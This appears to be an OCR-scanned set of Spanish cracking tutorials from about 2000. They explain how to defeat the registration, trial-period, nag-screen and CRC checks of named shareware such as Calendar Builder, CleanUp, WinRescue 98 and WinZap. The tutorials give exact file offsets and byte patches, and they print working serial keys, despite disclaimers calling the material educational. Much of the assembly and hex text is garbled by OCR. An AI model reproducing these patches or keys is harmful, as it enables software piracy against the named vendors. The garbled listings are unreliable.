:0040BBA6 83F80F cmp eax, 0000000F 
:0040BBA9 7C03 31 0040BBAE 


:0040BBAB 83E80F sub eax, 0000000F 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040BBA9 (C) 


:0040BBAE 
:0040BBBO 
:0040BBB3 
:0040BBB6 
:0040BBB8 


8BC8 mov ecx, eax 

83C003 add eax, 00000003 
83F80F cmp eax, 0000000F 
7C03 31 0040BBBB 

83E80F sub eax, 0000000F 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040BBB6 (C) 


:0040BBBB 
:0040BBBF 
:0040BBC1 
:0040BBC4 
:0040BBC7 
:0040BBCA 
:0040BBCC 


0FBE3C31 movsx edi, byte ptr 
8BC8 mov ecx, eax 

83C003 add eax, 00000003 
83EF30 sub edi, 00000030 
83F80F cmp eax, 0000000F 
7C03 31 0040BBCF 

83E80F sub eax, 0000000F 


[ecx+esi] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040BBCA (C) 


| 

:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 


:004 


OBBCF 
OBBD3 
OBBD5 
OBBD8 
OBBDB 
OBBDE 
OBBE1 
OBBE8 
OBBEA 


OFBE0OC31 movsx ecx, byte ptr 
8BDO mov edx, eax 
83C003 add eax, 00000003 


[ecx+esi] 


8D0C89 lea ecx, dword ptr [ecx+4*ecx] 


83F80F cmp eax, 0000000F 


8D0C89 lea ecx, dword ptr [ecx+4*ecx] 


8DO0OC8D40EDFFFF lea ecx, dword 
7C03 31 0040BBED 
83E80F sub eax, 0000000F 


ptr [4*ecx+FFFFED40] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040BBE8 (C) 


:004 
:004 
:004 
:004 
:004 
:004 
:004 


OBBED 
OBBF1 
OBBF5 
OBBF8 
OBBFA 
OBCO1 
OBCO4 


Apunta el 


:004 


:004 


OBCO6 
0BCO0O8 


0FBE1432 movsx edx, byte ptr 
0FBE0O430 movsx eax, byte ptr 


[edx+esi] 
[eax+esi] 


8D1492 lea edx, dword ptr [edx+4*edx] 


03C8 add ecx, eax 
8D8C51FOFDFFFF lea ecx, dword 
83F902 cmp ecx, 00000002 

754B jne 0040BC51 <========== 
OFFSET y pon un par de nops 
33C0 xor eax, eax 

B90F000000 mov ecx, 0000000F 


ptr [ecx+2*edx-00000210] 


Os suena esta direccion, 


seguro que si, 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040BC1B (C) 


| 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 
:004 


:004 


OBCOD 
OBC11 
0BC14 
0BC16 
0BC18 
0BC19 
OBC1B 
OBC1D 
0BC20 
0BC23 
0BC25 


0FBE1431 movsx edx, byte ptr 
OFAFD1 imul edx, ecx 

03C2 add eax, edx 

8BD1 mov edx, ecx 

49 dec ecx 

85D2 test edx, edx 

75F0 jne 0040BCOD 


8D4BOE lea ecx, dword ptr [ebx+0E 


83F90F cmp ecx, 0000000F 
7C03 31 0040BC28 
83E90F sub ecx, 0000000F 


[ecx+esi] 


puta 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040BC23 (C) 


:0040BC28 0FBE1431 movsx edx, byte ptr 
:0040BC2C OFAFD1 imul edx, ecx 
:0040BC2F 2BC2 sub eax, edx 


[ecx+esi] 


:0040BC31 49 dec ecx 
:0040BC32 7903 jns 0040BC37 
:0040BC34 83C10F add ecx, 0000000F 


* Referenced by a 


| :0040BC32 (C) 


:0040BC37 


:0040BC3A 


:0040BC3D 
:0040BC40 
:0040BC42 
:0040BC47 
:0040BC48 


:0040BC4A 


:0040BC4D 
:0040BC4F 
regresariamos 
Y entonces 
habra que Cambiar esto. 


* Referenced by a 
| :0040BB59(C), 


(U)nconditional or 


8A1C31 mov bl, byte ptr [ecx+esi] 
OFBED3 movsx edx, bl 

OFAFCA imul ecx, edx 

2BC1 sub eax, ecx 

B90A000000 mov ecx, 0000000A 


99 


cda 


F7F9 idiv ecx 
80C230 add dl, 30 


3AD3 cmp dl, 


bl 


(C)onditional Jump at Address: 


7406 je 0040BC57 <=== Si no se ejecuta este salto, pondriamos a 0 eax 


:0040BC51 
:0040BC53 
:0040BC54 
:0040BC55 
:0040BC56 


* Referenced by a 


l text eax, 


(U)nconditional or 


33C0 xor eax, eax 


DEF 
SE 
5B 
C3 


pop edi 
pop esi 
pop ebx 
ret 


| :0040BC4F (C) 


:0040BC 
:0040BC 


:0040BC5A 


:0040BC 
:0040BC 
:0040BC 
:0040BC 
:0040BC 
:0040BC 


Ahora realizamos 


7 
58 


5B 
60 
63 
64 
65 
66 


(U)nconditional or 


EFFFF call 0040BABO 
add esp, 0000000C 


57 push edi 

6A10 push 00000010 
56 push esi 

E850E 

83C40C 

5F pop edi 

5E pop esi 

5B pop ebx 

C3 ret 


BO0F => 9090 


OFFSETS: 
BOF4 => EB 
Abrimos el 


jecutabl 


crackeado, damos a about y dice que 


ax que sigue al call saltaria. 


Por lo tanto 


(C)onditional Jump at Addresses: 
:0040BB6E (C), :0040BB7E(C), :0040BB86(C), 


:0040BC04 (C) 


(C)onditional Jump at Address: 


los dos cambios el primero por un par de nops, y el segundo por 


"THIS IS A SHAREWARE P 


y 


un Jjmp. 


RODUCTI" 


Asi que abrimos otra vez el programa con un editor hexadecimal y buscamos algo como 
"TB. LoS LiSsirdri disp 0d. Uat." 


seguido a esto encontrareis 


en lugar de shareware he puesto 


"C.R.A.C.K.E 


Ya esta casi crackeado, 


¿Dt 


esta desactivada la opcion de registrar) 


USANDO 


EL 


EXESCOPE 


Este programa me lo recomendo el Mr_Mauve 


programs y los menus 
asi que abrimos el programa, seleccionamos el 
y sobre 25000 y hacemos doble clcik donde pone 


Pulsamos sobre Dialog, 
DefPushButton: 


Agreement, 


Ahora si que si, 


la url y modificar un poco 
el tamaño del formulario. 


la proteccion del 


(Pp), 


ExIcon 


EXICON a la mierda! 


solo quedan detalles en el menu about, como registration 


OK y ahora podemos borrar algunas cosas como la de Registration, 


"s.h.a.r.e.w.a.r.e." cambiamos la cadena por lo que querais, 


(Aunque 


permite modificar las ventanas de los 


License 


yo 


Por cierto el ExesCope solo acepta un cambio en la version no registrada, asi que ya sabeis 
a lo que tocais XD 


www.go.to/Stomper 
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Programa: Calendar builder 3.2b 


PROTECCION: Mane / Serial, Limitación de funcionamiento 
Descripcion: Utilitario que nos permite crear calendarios. 
Dificultad: Facilucha 


DOWNLOAD : http: //www.rks-software.com 


Herramientas: Softice W32dasm Editor Hexadecimal 


Yerba Mate 


CRACKER: FECHA: 07/09/2000 


INTRODUCCION 


Bienvenidos al segundo tutorial. Espero que el primero haya quedado claro y que hayan sido capaces de 
obtener el serial para ' Matris”. Si se te complicó mandame un e-mail. 

¿Que para que queremos un utilitario para crear calendarios?............. Esa es una buena pregunta. Lo 
concreto es que nos permitirá practicar un poco más. En este tutorial usaremos otras herramientas básicas del 
cracking. Iremos juntos a travéz de aciertos y errores (en mi caso suelen abundar los se -gundos). 


AL ATAKE 


Cuando corremos el programa por primera vez nos aparece una pantalla que nos da las gracias por probar el programa 
(¿2) y que nos informa la cantidad de días que nos quedan para evaluarlo. Le damos a 'OK' , vamos a ' Help' 'enter 
serial number' y ponemos cualquier dato (jugate pone los tuyos sin miedo), en mi caso esto es lo que puse : 


Register Calendar Builder 32-bit 
Enter your name and serial number received from RKS Software 


Your Mame: 
[veria Mate 


Your Serial Number: 


f 2345678] 


Pulsamos ' OK” y nos dice, como era lógico que hemos ingresado nombre o un serial incorrecto. Bueno, que 
hacemos?. Una sana costumbre es desensamblarlo con el WD32DSM89 esto nos dará alguna idea sobre la protección 
del programa. Hagamos esto pues. Una vez desensamblado pulsamos sobre 'str-ref'' y esto es lo que obtenemos : 


4/32D asm List of String Data Items Ml ES 


To Search Disassembly for Sting Data, Double Click on Text Cancel Search | 


“Invalid method call. Device already * 
"Invalid method call. Device is" 
"Invalid method call. ReportPrinter ” 
"Invalid month entered ” 

"Invalid operation, Device has " 
"Invalid Printer" 

"Invalid Serial Number or Name.” 
"Invalid value entered for Special ' 
'"sContral" 

"talic'" 


"ItsPersonall '" 
"Januar" 


Si nos fijamos con atención veremos una cadena que hace referencia a 'Invalid Serial Number or Name" doble click 
sobre ella y aparecemos aquí : 


32 URSoft 32D asm Yer 8.93 Program Disassembler?D ebugger 
ug Search Goto Execute Text Functions HexData Refs Help 


Disassembler Project Deb 


ales 


:00492356 BB45F4 
:00492359 SB38D0010000 
:0049235F SB55F8 
:00492362 BB45FC 
:00492365 ESSEFAFFFF 
00492364 84C0 


:0049236E 8B45F4 
:00492371 C780Z801000001000000 
:0049237B E996000000 


es 
moy eax, dword ptr [ebp-0€] 

mov ecx, dword ptr [eax+000001D0] 
mov edx, dword ptr [ebp-08] 

mov eax, dword ptr [ebp-04] 

call 00491705 

test al, al 


mov eax, dword ptr [ebp-0€] 
moy dword ptr [ebx+00000128], 00000001 
jmp 00492416 


* Referenced by a (UV)nconditional or (Cjonditional Jump at Address: 


| :0049236C (0) 

| 

:00492380 55 

: 00492281 ESSEFDFFFF 
: 00492386 59 

: 00492387 84c0 
00492389 741€ 
:0049238B 6400 


push ebp 

call 00492004 
pop ecx 

test al, al 
je 00492347 
push 00000000 


* Reference To: user32 MessageBeep, Ord: 0000k 


:0049238D ESCAZFF7FF 
: 00492392 66B93000 


l 
Call 00405350 
moy cx, 0030 


* Possible Stringbata Ref from Code 0b3 ->"Produet Registration” 


:00492396 BASOZ44900 


* Possible StringDdata Ref from Code 0b3 ->"Invalid Serial Number or Name.” 


EN 


| 
moy edx, 00492450 


lLine:309127 Pg 3725 of 485] Code Data 2:00492350 ADffset 00091 76Ch in File:Cb.exe 


Ñ 


En este caso resultó más que evidente sobre que salto comenzar a trabajar, este es solo un simple ejemplo (aunque te 
sorprendería saber la gran cantidad de programas cuya protección cae al cambiar un simple salto) . En general habrá 
que hacer ensayo y error. Cuanto mas conozcamos de asembler menos pruebas y mas dominio tendremos sobre las 


protecciones. Si nos fijamos en el "' WD32DSM89 ' vemos que en la posición 


0049236C 


00492380 tenemos un je (74 en valor hexadecimal) lo cambiaremos por un jne (75) con algún editor hexadecimal. 
Para ello nos paramos en la posión 0049236C (doble click en ella) del desensamblador y anotamos el Offset que se 
lee al pie del mismo, en este caso 9176C. Antes de tocar nada haremos una copia del ejecutable CB.exe dentro de la 


misma carpeta y trabajaremos sobre la copia por lo que pudiera pasar. Ahora sí vamos al editor hexadecial e 


introducimos el cambio 


Í li Copia de Cb* E 


FFFF 2912 0849 Ue bs ye 
00091770 F4C7 8028 0100 0001 0000 ODE9 9600 D00D ...(............ 
00091780 55E8 3EFD FFFF 5984 C074 1C6A ODE8S CA2F U.>...Y..t.J.../ 
00091790 F7FF 66B9 3000 BASO 2449 00B8 7024 4900 ..£.0..PSI..pslI. 
00091740 ES8B FCFF FFEB 6F55 ESAB FDFF FF59 8400 ...... id Mo 
000917B0 741C 6400 ESA3 2FF7 FF66 B930 DOBA 5024 


01] IS SO OR ru 
00091700 4900 B8D4 2449 O0ES 64FC FFFF EB48 55E8 1...$1..d....HU 
000917D0 44FE FFFF 5984 C074 1064 00E8 7C2F F7FF D...Y..t.j..|4.. 
000917E0 66B9 3000 BA50 2449 00B8 3425 4900 E83D £.0..PSI. 4. 
000917F0 FCFF FFEB 2164 00E8 602F F7FF B201 8B45 ....!lj.. /..... E al 
00091800 F4ES8 A42FB FFFF 8B45 F48B 80B0 0100 0033 ....... IEPS 3 


00091810 D2E8 062€ FS8FF 3300 5459 5964 8910 6840 ...,..3.2YYd..h0 
00091820 2449 008D 45F0 ES31 11F7 FF8D 45F86 BAD2 $1..E..1....E... 
00091830: OB00:ODEB 4411 T77FF UIES B2DD EJER EBES c.0.ciDio cocinas 
conse 40: BEsE 9Bo0B Esso CIOD ERRE FEEP 1400 “0000 “Llaca 


aAanaiacn Eno crcaA TEJA FA?n ESCL E7ECOA 7FaIAFTA 7961 DrrnrdAdnret Dnrrictr>a 


Ready ae [Offset 00091760 — Value: 18. ¡1132544bytes [OVA 


Guardamos los cambios y corremos la copia de CB.exe. Ingresamos los mismos datos que antes para registrarnos, 
click en *OK' y ........... 


Í About Calendar Builder 


| Catendar Buiider HREEREES 


Copyright (c) 1996-97 Garry 4 Prefontaine 


Distributed by RKS Software, Inc. 


Registered to: yerba mate 
Serial Number: 12345678 


Visit our online store: 


EZ E 


La frase ' lo bueno dura poco ' (no siempre cierta) en este caso se aplica perfectamente. Si cerramos el programa 
vemos que no aparece esa pantalla con demora de 5 segundos y nos ponemos contentos, pero al abrirlo nuevamente 
seguimos sin estar registrados. Evidentemente el programa vuelve a comprobar en algún lugar nuestro falso serial con 
el verdadero............... ¿Y ahora que?....... MIMO coccccnccnn. Pensemos........ Tenemos un programa que vence a los 30 
días y que nos da la opción de registrarlo. Siempre hay varios caminos posibles a tomar a la hora de crackear un 
programa. Podríamos trabajar sobre los 30 días y patchearlo para que no caduque nunca, podríamos seguir el camino 
que iniciamos y buscar donde se realiza la otra comparación........ Pero hay algo a mi parecer importante a la hora de 
decidir que camino tomar; esto es,el programa me da la posibilidad de registralo y conozco en que lugar realiza la 
comparación. 


Sin mas demoras pasamos al 'Soft-Ice' cargamos CB.exe y ponemos un breakpoint en el lugar donde realiza la 
comparación, esto es bpx0049236C pulsamos enter , F3 y el programa arranca introducimos nuestros datos y le damos 
al 'OK' y el Soft-Ice rompe en : 


0167:0049236C 7412 jz 00492380 
Una vez allí nos fijamos que hay en los registros .Veremos que en el EDX (hacemos dedx) aparecerá nuestro nombre, 


nuestro falso serial y en mi caso RKS-1329993. Evidentemente fue el camino más corto. Los otros caminos son 
igualmente válidos a los fines de practicar. 


About Calendar Builder 


Wersion 3.2b 
32-bit version 
Copyright (c) 1996-97 Garry A Pretontaine 


Calendar Builder 


Distributed by RKS Software, Inc. 


Registeredto: Yerba Mate 
Serial Number: RKS-1329993 


Wisit our online store: 


http ERTATA rks-soft 'ware. corn 


Que nos había fallado al principio? Si te fijas en la carpeta que contiene al Calendar builder veras la exisrencia de un 
archivo 'Ini'. En la misma rutina que nos agradece por registrarlo, crea en este archivo unas claves para name y serial. 
Cuando patcheamos el ejecutable para forzarlo a aceptar nuestro falso serial, tambien la creó pero con nuestro falso 
número por eso al volver a ejecutarlo se comportó como no registrado. 


EXFEARARE EA RRERERCES DD N DIC RIAFARE RECAE RECAE NARTER 


En el tiempo que tarde en hacer este tutorial y cuando volví a la página en busca de algún programa para dejarte de 
tarea ( pensaste que ibas a zafar? ;-) ) note que la versión había cambiado. Ahora iban por la versión 7”. 
Shiiiiiitiiiiiiitt. Como yo también recorro la página leyendo tutoriales ( la única forma de aprender ) y no conseguir 
la versión correcta es realmente frustrante, daré las modificaciones para la nueva versión. Hasta la fecha en 


www.winfiles.com estaban las dos. 


Calendar Builder versión 3.2j 


No te asustes que será corto ya que nos basaremos en todo el análisis anterior.Desensamblamos la víctima con el 
'WD32DSM89' y vemos que la protección cambió. Ahora tenemos tres posiciones de memoria con la string 'Invalid 
Serial Number or Name”. 


30049021E 59 pop ecx 
:0049021F s4co test al, al 
:00490223 6A00 push 00000000 


* Reference To: user32.MessageBeep, Ord: 0000h 
e 

:00490225 ES9ES1F7FF Call 004053C8 

200490224 66B293000 mov cx, 0030 


* Possible Stringbata Ref from Code 0b3 ->"Product Registration" 
| 
20049022E BA?CO34900 mov edx, 0049037C 


* Possible Stringbata Ref from Code 0b3 ->"Invalid Serial Number or Name." 
| 


00490233 BS9C034900 mov eax, D049039C 
200490238 ESTSFCFFFF call 00438FEBO 
20049023D ESF1000000 jmp 00490333 


Al igual que antes unas instrucciones más arriba tenemos un salto condicionado (mejor dicho tres) Esto es lo que 
haremos, anotaremos las posiciones de estos saltos ( 00490221, 0049024B y 00490275 ),pondremos un breakpoint en 


ellas con el 'Soft-Ice' y nos fijaremos que contienen los registros luego de haber introducido nuestros falsos datos 
(todo igual que antes). Si hacemos esto el Soft-Ice romperá aquí: 


00167:00490221 741F JE 004928F6 


Ahí mismo si hacemos 'dedx' veremos nuestro nombre, nuestro falso serial, RKS-1329993 y RKS-5321997. Si no 
hubiéramos trabajado en la versión anterior todavía estaríamos diciendo 'que genera dos claves válidas por cada 
nombre introducido'. Lo cierto es que el programador no mintió cuando dijo que si nos registramos una vez, todas las 
actualizaciones serían gratis. Cualquiera de los dos seriales son válidos 


Ahora te toca a vos ;-) en la misma página (www.rks-software.com) podrás bajarte 'Visual Business Card 3.3a' y ' 
Visual Labels 3.2f '. Usando la misma técnica tendrás que lograr registralos. Tranquilo que vas a poder. 


Por dudas o comentarios comunicate a http://yerbamatearO yahoo.com 
Espero que este tutorial te haya sido útil, nos vemos en el próximo 


Yerba Mate 


' Todo es fácil cuando se sabe como' 


IMPORTANTE: Lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, 
NO como robar alguna propiedad. Si vas a usar este programa debes comprarlo. 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: CleamUp 3.0 


PROTECCION: Limitacion de Tiempo 


Descripcion: Programa para limpiar el disco duro 


Dificultad: Facililla. 


DOWNLOAD : 


Herramientas: W32dasm y el pach de visual basic, Editor Hexadecimal 
CRACKER: Riverwind FECHA: 07/09/2000 


| INTRODUCCION 


Bueno aqui voy com 2 tuto,espero que os sirva de algo y de nuevo perdonarme si no me expreso bien.Este 
documento es solo para uso didactico. 


http://mindsoftweb.com 


El pach lo podeis conseguir en la misma pagana de karpoff,yo por lo menos me lo vaje de ahi. 


Nada mas ejecutar el programa nos sale un nag diciendonos que podemos registrarnos por 19 euros y que 
tenemos 30 días para evaluar el soft,pasados los 30 días dejaran de funcionar algunas opciones. 


AL ATAKE 


Bien ahora lo que tenemos que hacer es una copia del programa y despues buscar cualquier referencia que nos pueda 
ayudar a petar el programa,no hay opciones para introducir ningun name ni serial,bien que pasara si adelanto el rolej 
del ordenador 1 mes?,vale parece que todo esta correcto,pulso sobre limpieza rapida y nos dice que solo esta 
disponible en la version registrada,umm,vamos al w32dams para desamblarlo,bien parece que nuestro amigo no esta 
comprimido,vamos al strn ref,hey que pasa?,no sale mas que VB5 muy sencillo,es un programa escrito en visual basic 
de ahi que nos salga vb5,bueno si teneis el parche tendreis que aplicarlo,lo copiais y ejecutarlo, volver a desamblar el 
cleamup y ahora deberiais ver las strn ref. 


Bueno y ahora os preguntareis como vamos atacar a este programa?,a mi se me ocurre ir a por la nag y con un poco de 
suerte registremos el program.Bueno a lo dicho busquemos en strn ref algo sobre registro,bien nos encontramos con 
registro.exe,vamos aver de que se trata pulsamos y traceamos el programa hacia arriba asta que veamos el siguiente 
codigo 


ese jne tiene toda la pinta de tener algo que ver con ella,asi que yo probaria haber que es lo que hace el 
programa,combiemos ese 75 por un 74,doy por echo que ya sabeis hacerlo,asi que no lo explicare,una vez hecho esto 
comprobamos aver como se comporta el programa y para nuestra sorpresa la nag ya no aparece,objectivo 
cumplido,ahora comprobar las opciones del programa y vereis que siguen desactivadas y que el programa sigue 
estando en el periodo de evaluacion,esto es asi porque lo unico que hemos hecho a sido quitar esa nag tan molesta,bien 
vamos a por el registro del programa. 


Si miramos en las strn ref veremos algo asi como evaluacion,creo que esto es bastante sospechoso,le hecharemos una 
miradita aver que hay y si tenemos suerte nos encontraremos con nuestro salto,esto nos lleva asta evaluaci,pero si 
volveis a pulsar sobre ella vereis que hay otra referencia,para saber cual es os dire que teneis la respuesta en el propio 
program alli donde dice evaluacion,bien yo me quedare con la seguna opcion,esta nos lleva asta.. 


si observamos el codigo un poco veremos que hay je un tanto sospechoso y que parece que tiene algo que ver con el 
registro del programa,os preguntareis y como es que este tio sabe que es ese salto y no otro?,pues de momento no 
sabria explicarme bien,asi que sera mejor que no lo explique,os puedo decir que yo siempre desconfio cuando veo algo 
| asi y si miramos el offset y cambiemos el 0f84 por 0f85 y ejecutamos el cleamup veremos que ya no hay ninguna 

| limitacion de ninguna clase,el programa asido crakeado. 


Ahora lo que teneis que hacer es hacer el crack,para ello podeis usar el hacedor si lo quereis hacer en modo grafico 
para no tener que copiarlo al directorio del programa o el crakemake ambos estan esta pagina. 


Espero que esto os sirva para algo,a mi por lo menos me sirve para seguir avanzando en este mundillo que tanto me 
gusta,un saludo a todos y en especial a Karpoff por que sin el yo no hubiera escrito estos tutoriales. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programas: Unos cuantos ;-) 


Programa: 


PROTECCION: No creo que pueda llamarse así. 

Descripcion: Una historia simple con final felíz 

Dificultad: Ninguna 

DOWNLOAD: Ver texto 

Herramientas: Un ojo, W32dasm y un dedo (no es necesario cerebro) 
CRACKER: AE ER FECHA: 16/09/2000. 


| INTRODUCCION 


Todo empezó un tiempo atrás cuando instalé una placa de video 3D. En el CD de la misma venían algunas 
aplicaciones y juegos (todo shareware). Los juegos provenían de http://www .utilsoft.com . Son juegos 
simples,entretenidos pero relativamente viejos. A decir verdad, no hubiera escrito este tutorial de no ser por la 
gente de http://superwin.com/rescue98.htm .Ellos sí, lograron un muy buen producto llamado WinRescue98 
v5.00. Este programa fue lanzado el 30/58/2000. 


AL ATARKE ??? 


ADVERTENCIA: Lo que vas a ver en esta página no lo podrás creer ( al menos eso es lo que me pasó ) 


De la gente de Utilsoft instalé el Doble WideSlots , (un simulador de tragamonedas estilo Las Vegas) lo desensamblé 


boto 
con WD32DSMS89 , pulsé y me puse a buscar ' registration accepted ' o algo parecido. Esto es lo que encontré 


La string decía ' is now registered and fully functioning ' inmediatamente arriba de ella había otra que decía '317541' 
. Que no puede ser tan fácil, me dije. Sin embargo lo fue. Si introducís ese número en la ventana te felicitará por 
haberte registrado. 


Si haces lo mismo para AnimatedBlack. Jack esto es lo que obtendrás 


animated.jpg (36770 bytes) 


Créase o no ' 508150" es el serial correcto para el juego. En general te va a pasar con casi todos los programas de 
Utilsoft, te lo dejo para que lo investigues. Algunos estan hechos en Visual Basic por lo que tendrás que usar el 
WD32DSM89vb . 


Un poco de historia. La gente de Superwin ya había lanzado hace algún tiempo el WinRescue 95 . Seguro que te 
imaginas lo que sigue. EXACTO!!!!! A desensamblar se a dicho!!!!! Esto es lo que se ve: 


wr 95.jpg (51390 bytes) 


Tenemos una string ' Registration Key Accepted ', inmediatamente sobre ella ' msR318aU19y2E84L ' (para que tan 
complicada sigue siendo un misterio sin resolver) y un salto condicionado después de un test. Si el salto se realiza 
vamos a parar a invalid registration key . No hay más que decir msR.... es el serial válido. 


Hasta ahora que: juegos simples y un programa viejo. La verdadera razón de ser de este tutorial es también de la 
misma empresa. Se llama ' WinRescue 98 v5.00 '. Un programa creado hace menos de un mes, que vale U$S 25 y sin 


2222274 


EMDALgO coccnccconcconnnono Sifi........... más de lo mismo. Esto es lo que nos muestra WD32DSM89 


wr 98.jpg (52970 bytes) 


Que sí, que sí y que sí, la clave para el programa es ' SvetCHRISTA ' 


Rarezas del cracking. Si todos fueran así de fáciles, ni yo lo hubiera escrito, ni vos lo estarías leyendo. Ya 
hubiéramos perdido el interés ;-) 


Por dudas o consultas comunicate a http://yerbamatearO yahoo.com 


Espero que este tutorial te haya sido útil, nos vemos en el próximo 


Yerba Mate 


' Todo es fácil cuando se sabe como' 


IMPORTANTE: Lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, NO como robar 
alguna propiedad. Si vas a usar este programa debes comprarlo. 


sobre 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Trial 30 dias, Check CRC, Nags. 


W32Dasm, Softice € Heditor Hexadecimal 


INTRODUCCION 


El programa no esta comprimido ni encriptado, tampoco tiene trucos anti dasm ni nada extraño, La protección 
consiste en que el programa caduca a los 30 dias de uso, despues de los cuales muestra una nag 
recordandonos que ya no podemos seguir usando el programa. 


Tambien tiene una comprobación de crc con lo cual si modificamos el ejecutable nos dice que el programa a 
sido modificado y no se ejecuta. 


Y luego las molestas Nags, tiene una al principio del programa que cuenta los dias de uso, otra recordandonos 
el registro antes de que podamos siquiera probar el programa y otra al salir recordandonos de nuevo el 


registro. 


El objetivo será quitar la protección temporal, las nags y que no detecte que ha sido modificado. 


AL ATAKE 


Con el Gettyp sabemos que esta programado con visual c++ 5.00 y que posiblemente no esta 


comprimido ya que no hay ningun tipo de overlay. 


Vamos a buscar el mensaje que nos da al caducar el tiempo de evaluación (Your evaluation 


period is over), buscamos las sdr y hay la tenemos, doble click y aparecemos aqui: 


* Referenced by a (UWjinconditional or (C)jonditional Jump at Address: 


|:0040584D(C) 

| 

:00405860 S3IBDSCF3FFFFLE cmp dword ptr lebp+FFFEF35C], OOOODOLE 
:00405887 OFSEADOOOOOO jle 00405914 


* Possible StringData Ref from Data 0bj ->"Your evaluation period is oyer." 
! 


Vemos que despues de una comparación con 1E (30 en hexadecimal) se produce un salto si el 
valor es menor o igual a 30 hacia la dirección 0040591A de lo contrario continuamos hacia el 


mensaje de que ya no podemos seguir usando el programa. 


Vamos a seguir el salto, nos situamos sobre el jle y damos al cursor derecha, aparecemos 


aqui: 

:00405914 S3IBDECF3IFFFFOO cmp dword ptr [ebp+FFFFF35C], 00000000 
200405921 ?C3E 31 00405961 

700405923 SIBDSECFIFFFFLE cop dvword ptr [ebp+FFFFF35C], O00O0001E 
200405924 7F35 3jg 00405961 

20040592C SESS55CFIFFFF mov eax, dword ptr [ebp+FFFFF35C] 
:00405932 83C001 add eax, 00000001 

00405935 50 push eax 


* Possible StringData Ref from Data 0bj ->"You are on day +d of the evaluation " 
->"0f WINZAP." 


ya estamos en 0040591A, miramos las lineas siguientes y vemos que despues de dos 
comparaciones con 00 y con 1E (0 y 30 en hexadecimal respectivamente) se produce un salto si 
el valor es menor de 0 o mayor de 30 hacia la dirección 0040591A, es decir, si llevamamos 


menos de 0 dias o mas 30 dias nos vamos a 00405961 de lo contrario continua ejecutandose el 


programa y entramos en el mensaje contador de dias" 


Lo que vamos a hacer es hacer un salto directo desde 00405867 (el jle del principio) hacia 


00405961 con lo cual evitamos el contador y de paso el programa tampoco expira ;)). 


En 00405867 tenemos la orden jle a 0040591A y para cambiarlo a jmp 00405961 lo vamos a hacer 


de la siguiente manera: 


Sobre w32dasm pulsamos ctrl+1 y entramos en modo Debug, esperamos que realice todas las 
operaciones y damos a goto address ponemos 00405867 y vemos como aparece la dirección 
completa (00405867 OF8EADO00000 JLE 0040591A), pulsamos sobre patch code y ponemos JMP 
00405961, nos genera el codigo que tenemos que Cambiar para que la orden sea JMP 00405867 y 
no JLE 0040591A, creo que esta claro; bueno, pues ese codigo es E9F5000000, bien, ahora ya 
podemos cambiar la instrucción con nuestro editor hexadecimal favorito despues de obtener el 
offset de la dirección 00405867 que es 4C67 y que aparece en la barra inferior del w32dasm 


si nos situamos sobre dicha dirección. 
Como la orden a parchear tiene 6 bytes y la nueva solo 5 pues añadiremos un nop (no 
operacion al final que es 90, ya que sino variariamos la instrucción del programa, recuerda 


que por norma general tantos bytes quitas, tantos pones). 


Asi pues tenemos que cambiar 0F8EADO0O00000 POR E9F500000090 en el offset 4c67 de winzap.exe 


para que el programa no caduque nunca y no nos muestre el contador de dias. 


Ejecutemos de nuevo el programa...... PROGRAM HAS HALTED..... 


¡¡¡Jooooostia!!!, parece que el programa sabe que a sido modificado y nos lo dice con el 

mensaje anterior, no ejecutando el programa, pues menos mal que nos avisa, te imaginas que 
no nos dijera nada y se fuera a windows directamente, que pensarias?, bueno, este no es el 
caso y el programador tiene la poco picardia de decirnoslo con lo cual sabemos sin lugar a 


dudas por donde atacar. 


Buscamos esta referencia y despues de doble click aparecemos en: 


:0040204F 7561 jne 004020BZ 

:00402051 680Cc874000 push 004087Cc 

00402056 SDSDFCFDFFFF lea ecx, dword ptr [ebp+FFFFFDFC] 
200402050 51 push ecx 


30040Z205D FF152CE64000 Call dword ptr [0040E62€] 
200402063 230408 add esp, 00000003 


+ Possible Stringbsta Ref from Data 0bj ->"The program will terminste when " 
=>"you press OK" 
| 


200402066 6814884000 push 00408814 
:0040206B SDISFCFDFFFF lea edx, dword ptr [ebp+FFFFFDFC] 
200402071 52 push edx 


+ peterence To: MSVENT.stxcar, Ora: 0281 
1 


00402072 ESDF3E0000 Call 00405F56 
200402077 830408 add esp, 00000008 
200402074 6410 push DO0000010 


* Possible Stringbata Ref from Data 0Obj ->"Program has Halted" 
l 


Bien, hacia arriba vemos un salto codicional jne, lo que haremos será invertirlo para que el 
programa no detecte que ha sido modificado, asi que sobre 0040204F 7561 JNE 004020b2 
apuntamos el offset (aparece indicado en la barra inferior) y con el editor hexa cambiamos 


el 7561 por 7461 con lo que queda JE y ya no sale el mensaje de error. 


Probamos y ok, el programa no caduca y no sale el contador ni el mensaje d rror. 


Pero sale una fea nag antes de entrar al programa y otra al salir. 


La primera nag es fijo una messagebox (gracias por las lecciones ASM de tu pagina, 
Karppoff), asi que cargamos el softice ponemos un bpx messageboxa antes de ejecutar el 
programa y vemos como al ejecutarlo salta el sice, damos a F12 sin piedad hasta llegar al 
codigo del programa y cuando estamos en el codigo vemos justo encima una llamada (0040223c 
call 00405d70); bueno ya sabes lo que vamos a hacer, eliminar la llamada a esta call en esta 
dirección nopeandola con 90's, vas al w32dasm metes la dirección, apuntas su offset, vas al 


editor hexa y metes cinco 90's con lo cual la primera nag desaparece. 


Para la nag que aparece al dar al botón salir mas de lo mismo, puedes localizarla poniendo 
